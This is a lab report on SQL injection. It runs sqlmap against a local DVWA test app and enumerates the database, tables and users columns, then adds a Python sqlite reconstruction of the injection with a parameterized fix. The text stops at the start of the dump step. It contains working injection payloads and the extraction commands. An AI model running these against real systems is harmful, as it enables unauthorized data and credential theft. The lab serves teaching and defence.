I. Experiment Title

Hands-on Web Penetration Testing: SQLMAP

II. Objectives and Requirements

Understand how SQL injection vulnerabilities work.

Become familiar with using the SQLMAP tool.

1. Retrieve database information: the injection point(s), the current database name, the DBMS version, etc.

The target is the SQL Injection page of DVWA at security level "low". Two details of the command matter in practice. The --cookie value is mandatory: PHPSESSID must be the session of a browser that is currently logged in to DVWA (with a stale or missing session the server answers with a redirect to the login page and nothing looks injectable), and security=low is what selects the difficulty level being tested. --current-db asks for the name of the database the web application is connected to; before it can answer, sqlmap has to find and confirm an injection point, which is what most of the output below is. The trailing # in the URL is a fragment and is never sent to the server. Because no -p was given, sqlmap also tested the Submit parameter, which accounts for most of the 3725 requests; -p id would have confined testing to the parameter that is actually vulnerable.

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" --current-db


E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" --current-db
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
import distutils
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:26:19 /2022-05-26/

[09:26:20] [INFO] testing connection to the target URL
[09:26:20] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:26:20] [INFO] testing if the target URL content is stable
[09:26:20] [INFO] target URL content is stable
[09:26:20] [INFO] testing if GET parameter 'id' is dynamic
[09:26:20] [WARNING] GET parameter 'id' does not appear to be dynamic
[09:26:20] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[09:26:20] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[09:26:20] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[09:26:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:26:28] [WARNING] reflective value(s) found and filtering out
[09:26:28] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:26:28] [INFO] testing 'Generic inline queries'
[09:26:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[09:26:29] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="Me")
[09:26:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:26:29] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:26:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:26:30] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:26:30] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:26:30] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:26:30] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:26:30] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:26:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:30] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[09:26:30] [INFO] testing 'MySQL inline queries'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:26:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:26:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:26:40] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:26:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:26:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:26:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:26:40] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:26:40] [INFO] target URL appears to have 2 columns in query
[09:26:40] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[09:26:40] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[09:26:43] [INFO] testing if GET parameter 'Submit' is dynamic
[09:26:43] [WARNING] GET parameter 'Submit' does not appear to be dynamic
[09:26:43] [WARNING] heuristic (basic) test shows that GET parameter 'Submit' might not be injectable
[09:26:43] [INFO] testing for SQL injection on GET parameter 'Submit'
[09:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:26:43] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:26:43] [INFO] testing 'Generic inline queries'
[09:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[09:26:45] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[09:26:46] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[09:26:47] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[09:26:47] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[09:26:49] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[09:26:49] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[09:26:50] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:26:51] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:26:51] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[09:26:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[09:26:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:26:53] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:26:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:26:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:26:55] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:26:56] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:26:56] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:26:57] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:26:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:59] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:27:00] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:27:01] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:27:02] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:27:02] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:27:03] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[09:27:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[09:27:04] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[09:27:05] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[09:27:05] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[09:27:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[09:27:05] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[09:27:05] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[09:27:05] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[09:27:05] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[09:27:05] [INFO] testing 'MySQL inline queries'
[09:27:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:27:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:27:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:27:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:27:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:27:08] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[09:27:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[09:27:10] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[09:27:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[09:27:11] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[09:27:13] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[09:27:14] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[09:27:14] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[09:27:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[09:27:16] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[09:27:16] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[09:27:17] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[09:27:17] [INFO] testing 'MySQL AND time-based blind (ELT)'
[09:27:18] [INFO] testing 'MySQL OR time-based blind (ELT)'
[09:27:19] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[09:27:19] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[09:27:19] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:20] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[09:27:20] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[09:27:20] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[09:27:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[09:27:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[09:27:39] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[09:27:44] [WARNING] GET parameter 'Submit' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3725 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: id=1' OR NOT 1427=1427#&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:27:44] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:27:44] [INFO] fetching current database
current database: 'dvwa'
[09:27:44] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:27:44] [WARNING] your sqlmap version is outdated

[*] ending @ 09:27:44 /2022-05-26/

2. List the tables in the database

-D "dvwa" names the database returned by step 1. sqlmap reloads the injection points it stored for this target during the previous run (the "resumed the following injection point(s) from stored session" lines), so the detection phase is not repeated.

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -D "dvwa" --tables


E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -D "dvwa" --tables
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
import distutils

[*] starting @ 09:32:48 /2022-05-26/

[09:32:48] [INFO] resuming back-end DBMS 'mysql'
[09:32:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: id=1' OR NOT 1427=1427#&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:32:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:32:48] [INFO] fetching tables for database: 'dvwa'
[09:32:48] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[09:32:48] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:32:48] [WARNING] your sqlmap version is outdated

[*] ending @ 09:32:48 /2022-05-26/

3. List the columns of a specified table

-T "users" is given without -D. sqlmap warns about the missing database parameter and falls back to the current database (see the WARNING in the output); adding -D dvwa makes the command explicit and saves the extra current-database lookup.

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" --columns


E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" --columns
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
import distutils

[*] starting @ 09:34:06 /2022-05-26/

[09:34:07] [INFO] resuming back-end DBMS 'mysql'
[09:34:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: id=1' OR NOT 1427=1427#&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:34:07] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:34:07] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[09:34:07] [INFO] fetching current database
[09:34:07] [INFO] fetching columns for table 'users' in database 'dvwa'
[09:34:07] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+

[09:34:07] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:34:07] [WARNING] your sqlmap version is outdated

[*] ending @ 09:34:07 /2022-05-26/
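
The three sqlmap runs above all ride on one injection point, and the report only shows the tool's side of it. The following is an added example, not part of the original lab report and not sqlmap's code: a miniature of the DVWA low-level SQL Injection page built on Python's bundled sqlite3 so that it runs offline. The users table is constructed from the columns listed in step 3 and the accounts dumped in step 4; the first/last names are DVWA's default seed values, and the query shape (the id parameter spliced into a quoted string, selecting first_name and last_name) is an assumption about the DVWA handler, not something the report shows. It reproduces the boolean-based blind payload from the injection-point listing (and where the "Me" in --not-string="Me" comes from), the two-column UNION extraction behind --tables, --columns and --dump, decodes the 0x... literals in the UNION payload to show that they are sqlmap's random delimiters, and ends with the parameterized query that closes the hole. Two SQLite substitutions are made: `-- ` instead of MySQL's `#` comment (the page's `-- OXhb` payloads use the same form) and `||` instead of CONCAT().

```python
import re
import sqlite3

# Constructed seed data.  user/password are the accounts dumped in step 4;
# first/last names are DVWA's default seed values, assumed here because the
# report never dumped those columns.
USERS = [
    (1, "admin",   "admin",  "admin",   "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "gordonb", "Gordon", "Brown",   "e99a18c428cb38d5f260853678922e03"),
    (3, "1337",    "Hack",   "Me",      "8d3533d75ae2c3966d7e0d4fcc69216b"),
    (4, "pablo",   "Pablo",  "Picasso", "0d107d09f5bbe40cade3de5c71e9e9b7"),
    (5, "smithy",  "Bob",    "Smith",   "5f4dcc3b5aa765d61d8327deb882cf99"),
]


def make_db():
    # Columns as listed by --columns in step 3.
    db = sqlite3.connect(":memory:")
    db.execute("""CREATE TABLE users (
        user_id INTEGER, user TEXT, first_name TEXT, last_name TEXT,
        password TEXT, avatar TEXT, last_login TEXT, failed_login INTEGER)""")
    db.executemany("INSERT INTO users (user_id, user, first_name, last_name, password)"
                   " VALUES (?, ?, ?, ?, ?)", USERS)
    return db


def lookup_vulnerable(db, user_id):
    # Assumed DVWA-low shape: the GET parameter is spliced into the quoted
    # literal, so a single quote in `id` ends the literal and the rest of the
    # input is parsed as SQL.  Two selected columns is why sqlmap's UNION
    # payload has exactly two expressions: CONCAT(...), NULL.
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return db.execute(query).fetchall()


def lookup_safe(db, user_id):
    # The fix: bind the value.  A quote inside user_id is data, never syntax.
    return db.execute("SELECT first_name, last_name FROM users WHERE user_id = ?",
                      (user_id,)).fetchall()


def render(rows):
    # Rough imitation (assumed) of how DVWA echoes the rows into HTML.
    return "".join(f"<pre>First name: {f}<br />Surname: {s}</pre>" for f, s in rows)


def decode_hex_literals(payload):
    # sqlmap writes string constants as 0x.. so it needs no quotes inside the
    # injected SQL.  Decoded, they are plain ASCII: the random delimiters that
    # bracket the extracted value, plus a marker proving the UNION works.
    return [bytes.fromhex(h).decode() for h in re.findall(r"0x([0-9a-fA-F]+)", payload)]


def extract_between(html, start, end):
    # sqlmap's side of the exchange: cut every start..end span out of the page.
    return re.findall(re.escape(start) + r"(.*?)" + re.escape(end), html)


# SQLite differences from the page's MySQL payloads: `-- ` instead of the `#`
# comment (sqlmap's `-- OXhb` payloads use the same form) and `||` for CONCAT.

def boolean_blind(db):
    # Page payload `1' OR NOT 1427=1427#`: NOT(true) is false, only the real
    # row returns.  sqlmap's comparison twin with a mismatched number is true
    # and drags every row in; the extra "Hack Me" row is the "Me" that
    # --not-string="Me" keys on.  Returns (rows for false, rows for true).
    only_real = lookup_vulnerable(db, "1' OR NOT 1427=1427-- ")
    all_rows = lookup_vulnerable(db, "1' OR NOT 1427=1428-- ")
    return len(only_real), len(all_rows)


def union_tables(db, start="qzjvq", end="qxzpq"):
    # --tables/--columns are the UNION trick aimed at the catalog:
    # information_schema on MySQL, sqlite_master here.
    payload = (f"1' UNION ALL SELECT '{start}' || name || '{end}', NULL "
               f"FROM sqlite_master WHERE type='table'-- ")
    return extract_between(render(lookup_vulnerable(db, payload)), start, end)


def union_dump(db, start="qzjvq", end="qxzpq"):
    # --dump: pack user:password between the delimiters in column 1 and pad
    # column 2 with NULL so the column count matches the original query.
    payload = (f"1' UNION ALL SELECT '{start}' || user || ':' || password || '{end}',"
               f" NULL FROM users-- ")
    return extract_between(render(lookup_vulnerable(db, payload)), start, end)


if __name__ == "__main__":
    db = make_db()
    print("boolean blind, rows for (false, true):", boolean_blind(db))
    print("tables:", union_tables(db))
    print("dump:", union_dump(db))
    print("same payload through the bound query:", lookup_safe(db, "1' OR NOT 1427=1428-- "))
```

Run it with `python dvwa_mini.py`. The point of the last line is the whole fix: the same string that dumped five accounts through lookup_vulnerable() returns nothing through lookup_safe(), because the driver sends the value separately from the SQL text and no amount of quoting inside it changes the statement.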

4. Dump usernames and passwords (separate the column names in -C with commas)

The password column is a varchar(32) holding unsalted MD5 digests, which sqlmap recognizes and offers to crack with its bundled wordlist. Note in the result that admin and smithy have the same hash: with unsalted hashing, identical passwords produce identical digests, so one cracked value exposes every account that uses it.

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" -C "user,password" --dump


E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" -C "user,password" --dump
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
import distutils

[*] starting @ 09:38:43 /2022-05-26/

[09:38:43] [INFO] resuming back-end DBMS 'mysql'
[09:38:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
